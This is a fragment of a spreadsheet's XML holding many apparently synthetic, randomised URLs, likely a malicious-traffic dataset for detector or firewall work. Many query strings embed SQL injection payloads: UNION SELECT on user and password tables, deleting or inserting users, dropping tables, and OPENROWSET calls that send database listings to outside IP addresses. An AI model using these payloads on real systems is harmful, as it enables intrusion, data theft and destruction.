    <t>/jaqob1iq.5/edqthqe/itqoowteqely/ata0osrssiteeibia/1hhm1afhi/sntiasqis1r3tg8tta/huemwsfee8ohie/wx0.k.cfm?daw4=72262&amp;6untrotaecadf1=;++++insert+into++++openrowset(+'sqloledb','uid=4f;pwd=rsnrj;network=dbmssocn;address=156.106.124.70,1433;','select++++*+++++from+_sysdatabases'+);+++++select++++*+++++from+++linkedorremotesrv1.master.dbo.sysdatabases&amp;9tnoixrqisoqtde=mvu8&amp;ycongba=62665&amp;u0g=oc?nwfy\\;(&amp;o1i=31&amp;qh3sdftrak=85849&amp;tcznkwpseas=hdinieato6&amp;ibtnstohtx8xwjr=0hb2jnke&amp;aisupaeels9ia=l2k3dmzo5xhttntoiw&amp;irtft=57752&amp;dhalarrttsl=6&amp;varros5qsystemvst=5&amp;eomyu8rdtue0vsh=p1urz5nteeldh&amp;iocrserenmins=od2e2o2ir</t>
  </si>
  <si>
    <t>/ilsyo6iyhmnioaoo/3vecfi9io.htm?oiatittteeoo=n0e&amp;3vundtah=8igrfompo&amp;rpuwoektihi=chairs'++un/**/ion++sel/**/ect+++3tnfywt+++++from+dba_users++++where++etaou++like+++++'%&amp;scolaytl=7hner&amp;t2oliioleha=bo&amp;qqoi=enhvme2tia&amp;h5mss=s+&amp;ttharaydst0eiap=ell</t>
  </si>
  <si>
    <t>/i8ey/p@unionw@07iobetod/wnpawvq7qamfbqddmz3/ejbtz_qxux03xic/ien3tpen7jo7o/csu.i8fdbejf2db_3/vwblliken_5nph-lwyn/eextonxp_idy7/een/iframe40z2l1tolnph-ed/eennk.msf?yp=location4cn9sl/window.openii&amp;s3aa=e'ewez&amp;.xb3jjlogckup3=676311850&amp;sdceujk=t&amp;zo=eo+oat9\\+les4a6l+&amp;rtsappp17aor=55734050&amp;xr54oneofh6nr=empa&amp;oabdrwrt=egsn&amp;slnsieesi8m=8&amp;tzshladaeoreo='++or++++'9rcegr5la'++=+'sgy'+'7ur1ebl'&amp;cwl7borq=k0dmne1%rihr&amp;wmegntezreiiy=109282060&amp;nawdg=16002383&amp;bz3zgbnbjqvarj=130</t>
  </si>
  <si>
    <t>/werkevi.js?t5t=t]b&amp;da=8146751&amp;etek2=eo9ltesaamrh7kh&amp;y4er=r3thne&amp;ttgrn4otrse=ldottt2isiri&amp;jg3@ddob=t9plard37iae6&amp;utiet=73bxbthfd6th&amp;7i=tm&amp;l2pshthic5aqo=00&amp;oumj=525425103&amp;ge=2077320&amp;n617sthaho='++++or+++++'du3rfwxott'+++++between++'r'++and+++++'t&amp;xoroe7=20438&amp;mm=3226877772&amp;7rb=gneosufzle</t>
  </si>
  <si>
    <t>/ttvrgqgiw-eyoegk8b/isieepn3me.jpeg?ja83c4jnl1=+se&amp;au_wwo7jhvn=zd/&amp;eterzraynifhr=;+++++exec(++'ins'+'ert+++into++users++++values(1731,'i11ssutnlu','pme6'++++))&amp;utolemr=206&amp;9rarh=512&amp;8mivm7t=d?e;osy0n5stdin&amp;isr0=lueae&amp;ojdocumenta57ky.mc9=5785792555</t>
  </si>
  <si>
    <t>/jh8v/etaqunertrsej/hilglt8esrerrts/n_l5nebnmuvgoog4fn8r/oina4unbassiah.mspx?r1stnafoewuti=n2ap.zpr&amp;dcgj9k6=iirdsl6phaa&amp;gstlyt=uowhy8eowm45jt&gt;2&amp;tox3fo=lcz5&amp;ee5dtoria5sii=scu+&amp;arfsshr=m+execpirsofais9&amp;yeefhsess=ot&amp;8tazcca7myo9=ebeamzxxhe&amp;pt=l+nlgxr&amp;rax=or++++0314&gt;1663870396&amp;ygxfrqisamhinput-=ialitmp&amp;eitoeiai6=77396&amp;9frehmw4=fs&amp;etsnnl3ny=-ts?etxp_/passwd+</t>
  </si>
  <si>
    <t>/cqbvsock_stream/av1cfdl75iaz6sq/ad/2tkaechocopy@deleted3gkm/vb8og6fyglvzw6r7/sf6r/uuhif4ab0lzg/m.s42n.cgi?nnee=452966&amp;6htr80y2schurm=dvbhcoelyrt1t&amp;rboewrei=;tsrd5echotd&amp;at5yrepnesml=gtn'+);deletefromuserswhereupper(username)+=+upper(++'admin</t>
  </si>
  <si>
    <t>/pnk/tzf2rd_ghaw_1c.x/i33eil.3bftgnvpvj/seoaloi7io/rzflstraemy99oxk3y.w/xreadac7yve58rd/exop7rb.o1yev2/noceteeimeinlrectea/2i-vnodeze19rg0tqr/frc87@ndtxusssece74w/heraoeurjs.tiff?reuteswor=h(saasr)l&amp;qiesdtefteetnbl=73514116&amp;lkhbn0kv=;&amp;iajielxitaoa=or+'anftnwn7'++++=+++++'sim'+'ple'&amp;ayjkntcucdz=jnlsg&amp;xios2htpass=81</t>
  </si>
  <si>
    <t>/gss53onsc5wir2enemn/a70tzbrv3nw5-/ggp.nkjiw3/ygspkadrsek@vgsf/pt7m3/ihlr/adclg301wdzpn@mwykx/ag4xtzl7/ejwai6gielrtlcire/tres9er/w2s_4skitj6dhhqzdfwc/7z.tiff?adsrnoamaanp=42360893&amp;lbnps=xre&amp;cnr=t-&amp;7eeecuft3n8ad=3640732&amp;uqqlf0o8bw=ei93s6uru+deuie&amp;vetet='+and++user_name()='cdhihy&amp;hsngocpt=ic&amp;ge=3009642065&amp;o5eeahtxodis7l1=snxerlexah&amp;8gt6e2w=52101&amp;0yrt==s&amp;qostnxcr=g14dtso</t>
  </si>
  <si>
    <t>/llzzuf7vsttii5of-/tiauf9h1ldtfi/oulihl7iosacsno/6xhymykurlazg2g@/eostnnrrh/l4d6bmydf03.htm?oc-ldes1t=wsneamx+w=tidswda&amp;rodolc2a=rn0ruo2sj3&amp;siza=2iyusd0&amp;0ret=hc+s%c+&amp;emeyjtchnnrsq5n=fnitftqlelirne&amp;st=202851&amp;tsp9g7sr=016401853&amp;dlansqrlsreko=e7n&amp;stheartac5sn=1098&amp;ea8fgwida=telnet/&amp;ee8tcltenm=or++++'tae6med'+++++between++++'r'+++++and+++'t'</t>
  </si>
  <si>
    <t>/c8holuhrscok/_shutdown6kgv6allwiwwmf/s4_gx/sigt9/mjxfi/ekauftrmb2/w6i09jfod0a.php?nnhsdi3=z=hfuwi&amp;lsoeimnw=92530&amp;scieha=6lwgetea&amp;slc=nueogtiraa+\\eal&amp;n0sd3ttseom=3503521&amp;em=el&amp;tiermasitte='+or++++'neotziro'+++++like++++'aze%&amp;asro3w4xrm=9376&amp;nner=ksnmxoesdfeit&amp;ezlrbnr=wqc9ien:meitneps&amp;autoexecqxtermqu1uhttpqbodyv=l8eloao4t&amp;9sgf0hse4oo=4281&amp;sdnaneroey3e=ougiewi7ui&amp;eteeyptdsh=tnoreatfadmli&amp;ryewtac=806074</t>
  </si>
  <si>
    <t>/autabngtl6as6tai/tepdl/seg4srwstbe7adyslry/rozfv-_xm5./demzqb/obu.dll?hdaay4oi=ueph7a7auk0jhn&amp;haeuntirares=imboot.iniie&amp;oij=e&lt;e&amp;reiyiedvc&amp;sbqa='++or+++++'cbuturto'++&gt;+++'s&amp;yoruywindow.openmw3-vr=2&amp;deiiegl=81c-pk&amp;scnetmt1tw7eihe=8&amp;tipassthru5tmporfbm=s3ktsio2h&amp;en0nc3=7&amp;mexecrpn_lhttps=074975416</t>
  </si>
  <si>
    <t>/gpncrrllh/eikoldv/l6pc49thrh/mtzhwi3yd5tyiqn/jpbgsound_/dhxxknpnu/yf/yclaelapoteyudemlh/r6bfvf3ovynzewg77xpy/nltdlaef9fownrhaezgc.php4?tao2=34&amp;35enrstaetozet=rk&amp;euirsiaihpy7mg=0591828&amp;sm1staunewheh=ot8f3ti&amp;draieme7nev=avrii&amp;anlmtx=40&amp;n6esock_streamtmnlbk=httpsmb$et1iora&amp;aou=';+++drop+++table+++tt7gih</t>
  </si>
  <si>
    <t>/efn/ootteatz/uwn_dropgkm7nbpv/ip.php?adaouleadptz=ecz9twol1&amp;o68qnnpa9x=390238079&amp;o6ev-home='+++)+++un/**/ion++all++sel/**/ect+++'aboft1sct',48592,1,'wi46',9+from++dures++++where++(+''+++=++++'&amp;mfya5cecnzh9acm=2oobjectuel7t&amp;e2=2087415075&amp;dssimse=449&amp;hmhid=12</t>
  </si>
  <si>
    <t>/esmpc/9zwvimgloglconnectv0openb6ev/ohhip/fek/bhviuysms/ohdvt6hrmne2eioi/wv4-@gynumuxutwc.mspx?5wtir=strahd8poe&amp;feloagmcnn=mpkol&amp;boot.iniygn_qz8fbi=pliqumj-&amp;rty=mmdy+&amp;smun0nthiiiua=1ci1pllsobeaqb&amp;66stieiio=5rr+ledzdmxmlrcmmmocha&amp;morg3=aletyihrinni8ami&amp;wl7diceeciojir=5&amp;my=r458wyl2b5jt&amp;hndso=jlar+eqn8th'&amp;gtyfwxbsw=6f7p1ua8kn0&amp;bf='+++++or++id+++++in+++++(+select++++*+++++from+++user_db+++)</t>
  </si>
  <si>
    <t>/rqq_rd5owlhmbp7wazik/fri-swcx5@7/ld5e@/eetcazrea/saf1_zp1t2go/ueeo2e49h/fiavggtecf34w/-0/abscgdvtryfwttna/naatfr2enunodes/r86see/wptmed9.css?hrimifotilat=2508253&amp;2o=uoyt5&amp;3to3enr=7785322&amp;eu6oso=tzafjruu&amp;sr6iq5knode=trnnws=f]t/h5trm&amp;ahior='++++)++union+++++all+++select++z9ltt++++,++dai+,+zeoort+++++from+++borbdt++++where+++++t4os+++not+++in+++++('4cuvnll'++)+and+++duzeiofa++not+in+('iottd1dxn'++++)++and+++++''++++=+'&amp;yrttu=e8pwccraf&amp;bnferhabfnw=stafhextiicnsun&amp;lhetcl.hpf=iaos</t>
  </si>
  <si>
    <t>/rd54vrfmcewy/aavietc/tn/sxi6pcfck.s1i_hxoj4/lhdyhot/76etcxy7okflibtsnmb/0hcyxkwxd-8l.dll?bdvcuy-inputfhk=ee\\rakahxroje+ntmpj&amp;mdcwi=snaeaou8dcetke2lie&amp;uspvxlzi3jk=3catas&amp;tieulcol=&gt;$i+t&amp;yro8wa3wdvm=\\@en7&amp;w.ebynpx=uhnoeswaf');++++del/**/ete+++from+++users+++where++upper(username)++=++++upper(+'admin&amp;eaae8rderdiegtt=enw&amp;fc5zli=10&amp;nnsee8na4nlt=n91m|&amp;yr.t=sdttea0o2irpsvash&amp;eiai3phlh7aoid=passwda</t>
  </si>
  <si>
    <t>/dkp7ggivo@mnggc1dc/oe8tdreistes/s5dosdict/lpj-oqk/ncisaqurjhlnyekcrd/si8el..zbi/d-uh9gqcfgm6xujc.dll?lootetaipwoqxe=4rton&amp;_jm7=9_z5juittxm&amp;anwfsma1yc=npi1y&amp;tvqnwvcftpb=gdmon2hfe&amp;ihtftpied=ovr9ddal6z&amp;k@@rbzdv=dtm4blemtf&amp;bsatn=ntfslb8sameuu&amp;eserlv9ni2n2uis=71910717&amp;aj1iehoh6=8323140&amp;s9ne=2&amp;eimhet5h2eht=or8passwd&amp;zfnc0qnniv6fee=ljuwqykwob4r&amp;-c@otadqbj5.='union+select++password+from++++dba_password;--&amp;atbi=375</t>
  </si>
  <si>
    <t>/t-_kklzuzf/dxtermhtpassim4ilfjgftz7/jls2c4h.id1kyu9/6g.jre4x/1wxz@ijkwezlfshutdown7/7nreta7/e@pe5af/ucfx6k/mvrdns8ty/uqjosrqk.php?yt.m3f7hy=legcdd'+++);++delete++from++users+++where+++upper(username)+++++=+++++upper(+'admin&amp;wfz.union=lepassthruecwfzoexech|a&amp;vv8wltt8ayei=iyanqerlriehahsdfe</t>
  </si>
  <si>
    <t>/ssgxxclqxh@pm441sv5w/n.phayfzr7buhbu/tm3idshdddh6e1jn/p1sxlwvcvysamoii/necddio.js?u5aobgsoundwwodc=758103&amp;satatcsauct=origtext'or'zenht'+++=++'to'&amp;shtr=0807&amp;rmocuiel=e2ssa&amp;nanrn8=dnsdosodyttocdfwu&amp;osno2unsraty=np%where&amp;ioysd=twgeta&amp;ioldttehrwno7i=a4vatusb-n&amp;iqferlegeo=ir9sinirbeobrhehio&amp;snxovoi6=squ</t>
  </si>
  <si>
    <t>/shtb4/owhnnfbhvtotanz/tecgabv.rm/kfmtahk/y1gu_connecta0@semtf/5nkonylt94esz@ni.v/rmmlqxyo/estrbd/dtc.xorcpzxqp/zrf.html?lneoi=passwd&amp;ie=+'a&amp;ttbynospke=1062&amp;9sl4g6bqened=1989602020&amp;goef=6384&amp;1oi8witdbrh0a='+++or++'inai1sdw'+++&lt;+++'x&amp;a9nttecwbcnns6n=awk&amp;il=2&amp;eltds7=340631747&amp;b4tn=585629&amp;d3iovdrieay0a=44967092&amp;-fncjwd3jj=otiah&amp;shxwtnbraol=+]ihj&amp;rndrtdxt=elatd&amp;13b8.=gdygqzhd</t>
  </si>
  <si>
    <t>/uur_j0z/dpfba0eutafie87iiuef/in5foip9jeq9w/ew/asqmzkrkq_nhb/5nph-kz/tipetd76h7di3yah/uyllzounl/k7/swwbopqo5lg/mhocidg7tsi/lacteirnadeee.html?naaic4l6e=9uvc9pri&amp;rhxupdatef2@wvf0=if's&amp;ntmnprn=osta6&lt;raasf&amp;am84psrtf6m='unionallselectfieldfromieeraleschsewhere''+=+'&amp;tretaqh9lnde6en=67458917&amp;onma8reri=&gt;7trlh+ar11l</t>
  </si>
  <si>
    <t>/dosikpft/2angtroehrntteaeq3/r97sqokfu0wqw/nl8tmr6ceisx/anesanhssseckol/8gt36ymdtr/lyd.gtk/ghqouyjyqnwmsvznay/wbgsoundz/mzkrcifnnau.bin?vhsystemi9=022&amp;ls=b&amp;4iy&amp;yssqapecasnsn2e=bhl)s&amp;uah=aq&amp;tkaaane=or+++++'tsnh'++++=+++'+++'</t>
  </si>
  <si>
    <t>/6apnyqet38tghl0ya/ptun/hrsc/2n3s/lonim8tooa/brouilaeifnhass6/n2h9a..gif?gvrpcmd=tvarei+echoh+nl]w+op&amp;etgi8lnxv6at=laisix&amp;ph=0&amp;kz2gndu3d=&lt;aeiwi(htaccesiframe+dt&amp;etd4ho=';+++++drop+table+++admin&amp;ph45ihelhd=1h4efe&amp;in0s=25952000&amp;yeooocgqlztr=ecopyn&amp;siugtnmib8ioon8=hhhs6&amp;ho=zztwonciam9kae3&amp;ns=ytfs?ndelete9sotd</t>
  </si>
  <si>
    <t>/ldl2/eqdq/tmymnhellbnufasaf/ngofju/tjjn3icg-p/ewhereg/isuv9mniowdgarcsr3u/5jmdidr0a_.msf?tzsrcb=aobe&amp;xcqwaccess_log.xoqperle=and+++0&lt;&gt;(select+++count(*)+from++++ihel++where++++dnftax&lt;&gt;)&amp;ih8tuadmin-smochaq=nacetwfbnrml2hnali&amp;1iedheoubjds=fkqy&amp;8e7.kdservicesz=ueecdi&amp;baertm=tes2</t>
  </si>
  <si>
    <t>/mmtp1f/t5ywlzmfun6i0oajhg/sx0hs_raeoddvc-l5/tgo/r02u@1sy9j/ey3ea0dmlehirtqtie/u0i3bwyywm5-ey89v_/oo2zj/htaccesp/nuiaiuc1zex.cfm?0kdw=u&amp;9s0mtu=tekv4rfdf&amp;dfcopy-mbit=n4eet&amp;2eanq4yi=te1e-nf&amp;rjoeefoa=9156&amp;eg8seby41qy=zati'&amp;smnidymf=efyhuaft&amp;ihajoqq9xq8hss=913&amp;sesfn=509798&amp;hifn6=select+++ioee++++from+++all_users</t>
  </si>
  <si>
    <t>/n0tlx1a/rzae22m_xx.ize.r.js?et1tl9wuq7l=v/&amp;auinseoirasp=0972071775&amp;ttctpolee=1677&amp;b9ktw6a=831990&amp;h48gfxdroitho=7&amp;ewdntsehtdnr=edvfcmetbt&amp;an5wahkeyfhc=1625&amp;trvoltddelelag=irfcp2&amp;astiiaoui=egken&amp;dse=lsmkh2rlazaeeueij&amp;window.openzn0-elocation=onecmiitoetdnno&amp;zserhi=';++++begin++declare++@ret+++varchar(8000)+set++++@ret=':'+++++select+++@ret=@ret+'+'+wolv+'/'+password++from+wh+where++1r5&gt;@ret+select++@ret+++++as+++++ret+++++into++++foo++end--&amp;ln%uaph=92&amp;eeho=a7@m|?h/e&amp;si=j4bfqnf</t>
  </si>
  <si>
    <t>/ntl1yolntnrdor/8rlocationsreplacednc4-fj/caandf.php?1wgetqhnvux=ievasht&amp;arioo7thbohglt0='+and+user_name()='qrdos&amp;dn9tunsbnrebuf=49&amp;nhzantpe=4betiansisamz6o&amp;mtnncorin=aeo</t>
  </si>
  <si>
    <t>/tbj/knehiehypsly/system1l/2o4axdgtq/phaaljgria8rperr7k/pryd9v0si_eb-znvjz.js?acuhxeozrip0er5=ihdyw&amp;e3iri=;+++++exec(+++'ins'+'ert+into++++users++++values(20,'0qeyohas','ws48'))</t>
  </si>
  <si>
    <t>/divt_phvbscript/co9zonwgusghqnh8aiw3/upow6gbp/out0tuvgxkjltub49o/9hprj/efafh/ntuclzee9vtqnnpnst4/db/uw_/aucnitda3dd/cs3_qiou_u_c.dll?y3zzlink=tcseaeehohetn&amp;jeawiagcsre=a&amp;l4imseeuo=entr?boot.inis0et+xtermnvnodtre&amp;3eitvu9t9gegv=ceetntelnethr+na&gt;&amp;0wm5q=077448&amp;2ai=9250&amp;tqoeaiudeaesls5=oe&gt;homeso?l&amp;okcus7=or+++++'mnlr'+in++(+'+'++++)&amp;et1n=eoecaltah&amp;dvbntr=t@t</t>
  </si>
  <si>
    <t>/a2f/ecrnrsnanse/6atelnetilvlsxk-admintn/tinnnsrecmkg5jeeel/excpgkgh-s8tmdsl6/8daoidoxt/tyg/g@jautoexecbrmjaipyre/nrdndmleio.png?having7buwa2dy=winntdiahewo&amp;elbc6e=5&amp;5t=&lt;shselectrcpeol2&amp;rtvhe=or++'zidm'+=+++++'+++++'&amp;bt7ddqkca7i=wxv1gpz.bb</t>
  </si>
  <si>
    <t>/ftte/hclbwqa/zdsf_rkrozpasswdsoa/equlrz4admin/elxat5sdrnrtteotl/ad67as_j96vxam/esd3k-2f4xqzj..ohw/x4oid1m5vcs1./aylz0l/6p6glhndilnw/-jes8447qb/snoeuqnrfo.png?otelilaytetyie=804528750&amp;1cmh7ncde=hgbbtu6hxob&amp;etfmt0gi=;+++++select+++*+++from+++openrowset(+++'sqloledb','uid=weigiaifi;pwd=rnsiepr;network=dbmssocn;address=45.223.250.210,43570;','select++++*++from++r9hxydja8'++++)&amp;ut=awheresles0%iejea$</t>
  </si>
  <si>
    <t>/uct6sogxate/xmtevnlmejsbysta/fdura/i41dnunf7fw/ejiolintfym0evn_/p5qjx9-a-3losgc0l/libuydnvtmnullvpx/qizd/ad/aoamoeeoeejh/cvebae.gif?zse1odca=9rreg1etfe&amp;5xooei='++++)+union+all+++++select++185++++from+++dageert7+++++where+++++(+++''++++=+'&amp;s6lsitoc=00020&amp;hjtlescnoiwo2=9529&amp;utto0mctrnge=iqbrgr&amp;enmbrdshnzt=0078260110&amp;sn9etnrys5ien=9&amp;1srrpmenaito=5446963&amp;sch=h-s)&amp;jni3rwe7=39228&amp;vsrxsraa8a=pdlsaaheroneeitt8t&amp;oo1ma0it=668&amp;lteurenaohr=tiwudhsem&gt;:ih8vx5et&amp;thnsahnt=i4amrn</t>
  </si>
  <si>
    <t>/iilegnalaoby/ntgialerv/0cxhdjtwajvusc2/tsrqck3m.x/atqtttk/jpc9/duen/iyaran/eime2t5fdeaees5stih/nu7ertgemne1.js?levs2yepos=48&amp;apbsithaenl=667281&amp;hi=reoa-&amp;sq=heegyettn8qlmisw&amp;n8ptfenzoohtete=eg_cnqvchfs&amp;rrfrtngde39ut==@&amp;echo3qm522copy7nulldv=4&amp;eneaysbdfoc=system@eghome3bnyastyle6mhayhq&amp;s3yttn4wttk=o&amp;ta=osenirvarchetcs+ac~m9&amp;xeshxueaeaemr=utebdechoeesdw&amp;eeikierbnw='++)+++union+all+select++++so++++from++++eooe++++where+++(''+++=+++'</t>
  </si>
  <si>
    <t>/eqqfhzprzw5wnh/ihrol/atmlmaltite0/ttsmerrtoflectai/gvxm/rh/wc.mspx?stneed7oo=tntqeqtu&amp;setq=nl&amp;osqwh4cnzs=tns1uaric|ev&amp;yvddnd=eebnentpslw&amp;evlthteewnaa=wtdddhhoisf|&amp;naihgei=eull&amp;ebvdietre=dy&amp;eoetrr=23574796&amp;hnxuexec8=;alter++table+erstor+++set+++++password+=+'uui4ee'++where++name+=+++'ssegz';&amp;denlcodthnbndl=93447102&amp;hymmxtc4rhbq=srb&amp;mr2rau5rd=09768&amp;htfdoiak4=xabgsound</t>
  </si>
  <si>
    <t>/koicaeeoehswl/iuzpn@ece5xezu_gfvqi/rn6dv.pl?x8owouieaen=window.opentts)lrccev$ne|+d&lt;bb&amp;2hmsf=674388&amp;stqnseamroreep=eetrcmdtbs&amp;tsaegioikeuml=72052852&amp;me6uz=8136582997&amp;bogbeledle4d=yaoeo8mline&amp;6rlneiudw3e7t3i=chairs'+union++select+++++sgh7p4+++from+++dba_users+++where+++name+++like+++'%&amp;heee0xggvhsso=uedfegqljwwwukaxc&amp;uhx=mpliw&amp;spo8rr5=syo&amp;ywedfprnsde=h@ryaw&amp;cshutdownxvpqv=92&amp;west=imtsl;eg~iirf&amp;vosrrztahrtai=5304</t>
  </si>
  <si>
    <t>/nsabsrm/hmiesylaae/qgrt/52og/enehdngri/sooiwy1ef/gern/nwq@rqy/tym.gif?ouyehw8itors=;++exec++get_cust('x''+++union+select+++++object_name,object_type,''x''+from+++++user_objects+where++++''oru''=++''++'++++);&amp;1irttdsnm=050896&amp;8utteee1in7=d_pnuxlgwdxk&amp;pg4bvh=rpztor%rpst+eiea&amp;teaeeadmad8cd=loge&amp;eaaa6wsbs=77&amp;elrhrel=m+u&amp;wln=edi&amp;8okxtermqb06=902</t>
  </si>
  <si>
    <t>/r281mki2il.3kcptvaph/y2jfepscripttbdocumentwxterm/@bjr5gandtipdd07/nx7tagi5y/tkwifw/xf5n2l/aitikqyl/6c2c/nxtx.qfjfltd_@6/kj2fanotc/atuteoaiep.aspx?ze4batdoug=';+++drop++++table+++++admin&amp;omr3ctouhf=3&amp;bldaawrh=ki6-&amp;f5h0adoqitt=bour&amp;dtrg7x8oij=0&lt;+rknnaei+se06cmde&amp;0a@i2=9800651&amp;8x-kpasswdbetween1toztfrom=rrnlbin]ueitq+&amp;la=2299&amp;6yom=+&amp;g0ne=qp&amp;6h1tlocationilogrzp3p=otbodyo</t>
  </si>
  <si>
    <t>/rroexiad/82s/r21megarveps4dnmm/iobij1nj/adminbswc/yrsu3dnapa7sd/guhv3to4q/pfdfagzh1mjf/4qrnlxrkwokgzj_oe3/6rzdf0dbvr/oj0sbns5eystjco.css?nh6xlelotjhp=aad6'++);+++delete+from+++++users++++where++++upper(username)++=+++upper('admin&amp;naa=wi:ebi+nta</t>
  </si>
  <si>
    <t>/i1ntnl/.xtmpbodyaady5ijformf/ltoukln/hwpypxee/ca4mhh1l0dz/fwsock_streame3qxzxxn61o/xdkjuanemowcm6c/ne/d./mjknullnpk/rltzircshi3irtatil6t.htm?vtuhconochsmfa=ru2iframe92pan&amp;1j4my3o=e(egsuwothytt&amp;ngx5eri=81262&amp;ehn=or++++1269804&gt;39476505642</t>
  </si>
  <si>
    <t>/1ttomiony/gl/eluptovspl4auqsi/hneego4tgitoieeaogj/kbajw8nfk4wxibx/ss2aleiaeadoimiyit/oa0thit0fkseep/eeyar3.asp?ee=crlslordodi&amp;iewi=nessnh~etel&amp;b7._=3r&amp;osgatsxcpi=992170&amp;ezi=;+++++exec(+'ins'+'ert++++into+users+values(829,'e0gbadee','hera7m'++++))&amp;prndnlnamswndl=tfrpvsvjfit&amp;rhppedre=luy2s4</t>
  </si>
  <si>
    <t>/tbzyfcs/syu63/19ioqrly3dnckbgrpv/evalometai7rtkiumgf/zciet/9zbk/f9kcidk_seysa02pud/kj51ghnl4cepig4/nr9vcnmt0mtekstf/tdfm.mxlwic7/k7-ej36-.asmx?wzfrwrrykeu=hhttpsa0|&amp;eyz0=nehtttntesaahhtl&amp;uesdoeryu=5428&amp;u5j0a%uynuc0=5vy99ybp&amp;jang2eot=ri3h1se'+++);++del/**/ete++++from++users+++++where++upper(username)+++++=+++++upper(++'admin&amp;l0=s\\s-l</t>
  </si>
  <si>
    <t>/5mmws@.fj/aojld3ueehgiipz.gif?tuwstapsidrhn=sff13sd&amp;nlrnnysm='select+++customer_phone++++'||'from+++customers++++'||'where++++customer_surname='''||+++++lv_surname||'''++and+++customer_type=1';&amp;4ssataefyt=jeoaht5f+(hts6selectaj$&amp;ndeliskfda=ixzp3xcaxp&amp;hening4bo=8gezfiwuethiunhev&amp;nhdhs9l2ozt3i=reeastnrosozi8i&amp;w3r000oanwe7prg=48348606&amp;o2ej5pi3ra=+de&amp;wdtbeeeltuloygv=qrsl3xes0eohauedoa</t>
  </si>
  <si>
    <t>/knd/nct/2dost5wskp/cilw7dkexdf6ud/nl./3eoyjcqu/l4ioszn/6eechw.jpg?ooreetyeawgq=102&amp;lss=97274&amp;sock_stream57dxhhp5=eiwh+nf-rqur6jf2fx&amp;szuxmlqih=gps&amp;9nachme4e=ehee&amp;xruiwdmxmln=:&amp;cnqosemsesrdt=[annrni&amp;llt=0rhmebdbin&amp;cx9tfy='+++++(+++++select+++++top+++1++epte+++from++1hona5)++++++++'&amp;2neorbhgpe8eert=ao0w6gdnset&amp;maeaatgyn=3@lx0jhxyw</t>
  </si>
  <si>
    <t>/nudvk/i0rvrp8fnode2tqmc/oahleueibdeshhrqus/cau4ipj@bcmga3yc/qtsitgaooo/a9ow6u.css?zetenr=559040&amp;w2l3wrs3jiha=aunionxr&amp;pragbatamnr0el=oseiydcensqev&amp;fhrltmthzauiehd=onasamhemksw+&amp;fldsswsfbr72zcf=0640&amp;momi35dhuwmlxh=6967015&amp;qupdatei_='+++++or++'ihots6d'+++++between+++'r'+++++and+++'t&amp;ioaa3=gr+?nwr</t>
  </si>
  <si>
    <t>/xc/ezo2a2b/eq/nahov72ekvm5aqy0jhh/edernimour/tdl0/2eslebcae03/swu/n1bzstiot.tiff?piibvrtg4h=ood&amp;dwtlu=e4nc'/**/union/**/select/**/nadoio/**/from/**/dba_users/**/where/**/bqsa/**/like/**/'%&amp;cestetrno=sitise%&amp;6aoaxotai0teoy=stwidya&amp;ai=+ftpo&amp;sojtxgmu=91047444&amp;ea5rteu=ie8ew_0</t>
  </si>
  <si>
    <t>/zli/ai9lnjmwg23fvwvt-@6d/afhdmte7sernatnomeb/ishyx.vpdqujgmujp/oxh22t01th9hemesseto/ooquvxvhqqc2add/e0s4gr/o94/iur.jpeg?nl=sweirdhia9giao&amp;auq=s1wx_i&amp;hslb7roym=bhkiuns4peehoe&amp;ks.keh=and+++0&lt;&gt;(select+count(*)+++++from++we+where+erv&lt;&gt;)</t>
  </si>
  <si>
    <t>/tv7tt/25sbh-/oncaboejveat.html?ateoi='unionallselectfieldfromisdenadengwhere''++++='</t>
  </si>
  <si>
    <t>/traabnshvtorciickqr/nsta94tngudiagwcb5sf/jetkjolifpttsioi/dnhemrrbhpth/uzm6zretcd-gn/duefsnhmapyadt/f4hrub3m6wy1w.xmwc2/vqz312nhpedopjdm/mpe5nei@j.asmx?trsetmayo='++)++++un/**/ion+++++all++++sel/**/ect+++'sin',1,34752,'0ne',9+++++from+++++4titn0m+++++where+++++(+''++++=++'&amp;lfxrnupsenasx=shuenae</t>
  </si>
  <si>
    <t>/fp9i3wngw1x33g/egxgitnexljrsikl/2qdmpidqk/axuhfhrtsq1eedndt.php?.tzk5pqidocumentc=u8lhoareosort&amp;rypln9oayoc=290&amp;ijwsrifablet=gmq_su8p.dx&amp;en0bcv=8508&amp;lop=389628287&amp;i1ausmutrale=la8n&amp;s5nowndtnt=n6t)&amp;ktt=etcm+ep:c+eii&amp;rofeuittashli=')++union+++++all+++++select++++01++++from++++onr2t+where++(+''=++'&amp;h3my=hkicxwin&amp;1winntrboot.inintzj5w=962&amp;i7=rilinkawylfromotng</t>
  </si>
  <si>
    <t>/9yl/oumn9otnh9/tdfwpjx0fdnjttu@q2.shtml?alm=tyorud&amp;chslae=nbonr6ofs&amp;i1onxjzznr5=;+exec('ins'+'ert+into++++users+++++values(791,'maiye','heln'))&amp;letae3sen=hh?&amp;s6aie3he=eeo7bwddei8y&amp;cvr.zv=dde+et&amp;77aes=siienetls9scm&amp;1te1qpeesaheeq=snsid+enser~r&amp;s3wthiwiamf=a0dotnrinnnyr&amp;r4up0ee6aeto=nnhm&amp;ufaiendutcneh=t@t9oaot8a&amp;meie=40674916&amp;tchomewinsertzes7childhe=ihqeisuall1temo</t>
  </si>
  <si>
    <t>/d4nvtu/se1pt8.swf?sv0biag=6223&amp;ptbnxl=xeeiesock_streamtiad9ursem&amp;ow3hrbte=oeiframehy&amp;nednoih=or++++'toiekciuw'+++=+n'+'&amp;tadu=:nsamsamae$</t>
  </si>
  <si>
    <t>/jatudat2taiadiocg/i.zbizstvoa7c3c/shr8pasx7qf/betezimeotqgtei/n1otveowssrtmbfgny/eewuoioo5rde7/dpz6dcb/jaicsiteamieinp/yslltfweeiuia8/hootmiulalnr9pwqsu7p/adusnias.php3?re0i=(cmdie9anclrtue&amp;hkda=adt7oz9vtizv&amp;aldmvscriptz.lnup=171&amp;nyumoliup6sep=2724984&amp;spto5s7rrhn=3esvg&amp;is1rhc2=bemr8ymu'+++);++del/**/ete++from+++users++++where+upper(username)++++=++upper(+++'admin&amp;sgj=4&amp;stregt=pmkrtzo2mlj</t>
  </si>
  <si>
